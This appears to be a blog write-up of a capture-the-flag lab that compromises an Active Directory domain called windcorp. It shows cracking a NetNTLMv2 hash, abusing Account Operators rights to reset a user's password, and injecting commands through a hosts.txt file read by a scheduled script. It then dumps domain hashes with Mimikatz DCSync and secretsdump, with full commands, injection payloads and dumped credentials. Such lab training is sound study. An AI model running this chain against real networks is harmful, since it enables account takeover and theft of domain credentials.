cat busehash | hashid
Analyzing 'buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000'
[+] NetNTLMv2
We have NetNTLMv2. You can hashcat for it.
$ hashcat -m 5600 busehash /usr/share/wordlists/rockyou.txt
Windows Remote Management Phase
The Windows Remote Management (WinRM) protocol to execute commands and manage files on remote Windows machines. We can establish a connection with the credential we have obtained.
$ evil-winrm -i windcorp.thm -u buse -p uzunLM+3131
*Evil-WinRM* PS C:\Users\buse\Documents>
We got the connection. This is a powershell environment.
*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
*Evil-WinRM* PS C:\Users\buse\Documents>
Now you should get group information.
*Evil-WinRM* PS C:\Users\buse\Documents> (Get-ADUser $env:USERNAME -Properties *).MemberOf
CN=IT,OU=Groups,DC=windcorp,DC=thm
*Evil-WinRM* PS C:\Users\buse\Documents>
Now let’s get information about the IT group:
*Evil-WinRM* PS C:\Users\buse\Documents> (Get-ADGroup "IT" -Properties *).MemberOf
CN=Account Operators,CN=Builtin,DC=windcorp,DC=thm
CN=Remote Management Users,CN=Builtin,DC=windcorp,DC=thm
CN=Remote Desktop Users,CN=Builtin,DC=windcorp,DC=thm
List all computers in AD (Active Directory):
*Evil-WinRM* PS C:\Users\buse\Documents> Get-ADComputer -Filter *
DistinguishedName : CN=FIRE,OU=Domain Controllers,DC=windcorp,DC=thm
DNSHostName : Fire.windcorp.thm
Enabled : True
Name : FIRE
ObjectClass : computer
ObjectGUID : 816685d9-50db-488d-943b-1f4ec7ef3406
SamAccountName : FIRE$
SID : S-1-5-21-555431066-3599073733-176599750-1000
UserPrincipalName :
Privilege Escalation Phase
We can gather information about another user, but first we need to look at the privilege capabilities of the current user.
*Evil-WinRM* PS C:\Users\buse\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Check for other details.
*Evil-WinRM* PS C:\Users\buse\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
We see that we are part of the Account Operators group that means we can modify all accounts except admin accounts. Let’s check if there is a script in our system.
*Evil-WinRM* PS C:\Users\buse\Documents> cd C:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/2/2020 6:33 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 5/8/2020 7:43 AM Program Files
d----- 5/7/2020 2:51 AM Program Files (x86)
d----- 5/3/2020 5:48 AM scripts
d----- 5/29/2020 5:45 PM Shared
d-r--- 5/2/2020 3:05 PM Users
d----- 5/30/2020 7:00 AM Windows
*Evil-WinRM* PS C:\> cd scripts
*Evil-WinRM* PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 8/30/2024 2:30 AM 31 log.txt
*Evil-WinRM* PS C:\scripts>
We found checkservers.ps1 powershell script. We also have log.txt file.
*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 08/30/2024 02:31:21
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
[redacted]
[redacted]
There seems to a script which runs every minute. This script also sends notification to brittanycr user.
A PowerShell script called checkservers.ps1, which is used to check a file called hosts.txt located in C:\Users\brittanycr\ and passes the contents of the host file to Invoke-Expression.
You can check if the user account is enabled.
*Evil-WinRM* PS C:\scripts> Get-ADUser -Identity "brittanycr" -Properties "Enabled" | Select-Object -ExpandProperty Enabled
True
Yes, it is.
We are part of the Account Operators group let’s reset the password for the account “brittanycr”.
*Evil-WinRM* PS C:\scripts> Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "helloworld:#1" -Force)
Or you can just use:
*Evil-WinRM* PS C:\scripts> net user brittanycr helloworld:#1
You can check when the password was last set for a user.
*Evil-WinRM* PS C:\scripts> Get-ADUser -Identity "brittanycr" -Properties "PasswordLastSet" | Select-Object -ExpandProperty PasswordLastSet
Friday, August 30, 2024 2:37:14 AM
*Evil-WinRM* PS C:\scripts>
We can connect via SMB with our new password.
$ smbclient -U 'brittanycr' //windcorp.thm/Users
Password for [WORKGROUP\brittanycr]:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr\
smb: \brittanycr\> dir
. D 0 Sat May 2 19:36:46 2020
.. D 0 Sat May 2 19:36:46 2020
hosts.txt A 22 Sun May 3 09:44:57 2020
15587583 blocks of size 4096. 10905691 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\>
We found hosts.txt file.
$ cat hosts.txt
google.com
cisco.com
Let’s make our malicious hosts.txt file.
$ cat hosts.txt
; net user helloworld Hello12345! /add;net localgroup Administrators helloworld /add
You can use this payload too for user buse:
; Add-ADGroupMember -Identity “Domain Admins” -Members “buse” ; Add-ADGroupMember -Identity “Administrators” -Members “buse”
Now just put it.
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
Now just verify and run it.
$ crackmapexec smb windcorp.thm -u helloworld -p 'Hello12345!'
SMB windcorp.thm 445 FIRE [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB windcorp.thm 445 FIRE [+] windcorp.thm\helloworld:Hello12345! (Pwn3d!)
Now we have created it. Now exploit it if you need.
$ python3 /usr/share/doc/python3-impacket/examples/psexec.py helloworld@windcorp.thm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on windcorp.thm.....
[*] Found writable share ADMIN$
[*] Uploading file eWyKxFXx.exe
[redacted]
[redacted]
You can connect via WinRM too.
$ evil-winrm -i 10.10.187.82 -u helloworld -p Hello12345!
*Evil-WinRM* PS C:\Users\helloworld\Documents> whoami
windcorp\helloworld
*Evil-WinRM* PS C:\Users\helloworld\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
We are root now!
Hashes with Mimikatz & Impacket
You need to download it https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Invoke-Mimikatz.ps1 [ <=> ] 295.93K --.-KB/s in 0.009s
2024-08-30 10:16:12 (33.0 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [303035]
Now use it via our new user :
*Evil-WinRM* PS C:\Users\helloworld\Documents> upload Invoke-Mimikatz.ps1
Info: Uploading Invoke-Mimikatz.ps1 to C:\Users\helloworld\Documents\Invoke-Mimikatz.ps1
Data: 2938820 bytes of 2938820 bytes copied
Info: Upload successful!
The file has been transferred. Activate it.
*Evil-WinRM* PS C:\Users\helloworld\Documents> . .\Invoke-Mimikatz.ps1
Type the following command:
*Evil-WinRM* PS C:\Users\helloworld\Documents> Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'
[redacted]
[redacted]
We have admin hash value:
bfa4cae19504e0591ef0a523a1936cd4
Let’s connect via WinRM:
$ evil-winrm -i windcorp.thm -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4
*Evil-WinRM* PS C:\Users\Administrator\Documents>
You can use Impacket too for getting hash:
$ python3 impacket/examples/secretsdump.py -just-dc helloworld:'Hello12345!'@10.10.187.82 -dc-ip 10.10.187.82
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bfa4cae19504e0591ef0a523a1936cd4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7e9df5e082c2637f7964cb60707f4ae4:::
windcorp.thm\redostrich210:1103:aad3b435b51404eeaad3b435b51404ee:a4ff2d641246d4e9804b7748b94d176d:::
windcorp.thm\goldenladybug228:1104:aad3b435b51404eeaad3b435b51404ee:f88583f07cb7eaf67cc7b82722bdd3f9:::
windcorp.thm\yellowostrich458:1105:aad3b435b51404eeaad3b435b51404ee:88fad4f2a0c7c10ec77fa4c0e3e82968:::
windcorp.thm\angrygorilla824:1106:aad3b435b51404eeaad3b435b51404ee:c60a512ce8ad23a3e2b8332e0471f798:::
[redacted]
[redacted]
Keynotes
- Windows Remote Management (WinRM) is a Microsoft protocol that allows administrators to remotely manage and configure Windows operating systems. It is built on the Web Services-Management (WS-Management) protocol, which is a standard web services protocol used for systems management.
- Spark Instant Messenger is an open-source, cross-platform instant messaging client developed by Ignite Realtime. It is designed primarily for enterprise and team communication and is known for its robust features that support secure, real-time communication. Spark is typically used in conjunction with an XMPP (Extensible Messaging and Presence Protocol) server, such as Openfire, which is also developed by Ignite Realtime.
- NTLM (NT LAN Manager) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. It was developed in the early 1990s and has been largely replaced by more secure protocols like Kerberos, but it is still supported and used in some scenarios, particularly for backward compatibility. NTLM relies on a password hash (NTLM hash) to authenticate users. This hash is a cryptographic representation of the user’s password.
메타데이터
- post_id
- 3893a7cdf0bb
- slug
- case-spark-winrm-3893a7cdf0bb
- url
- https://medium.com/@brsdncr/case-spark-winrm-3893a7cdf0bb
- canonical_url
- https://medium.com/@brsdncr/case-spark-winrm-3893a7cdf0bb
- author_url
- https://medium.com/@brsdncr
- status
- ok
- fetched_at
- 2026-06-27 18:20:27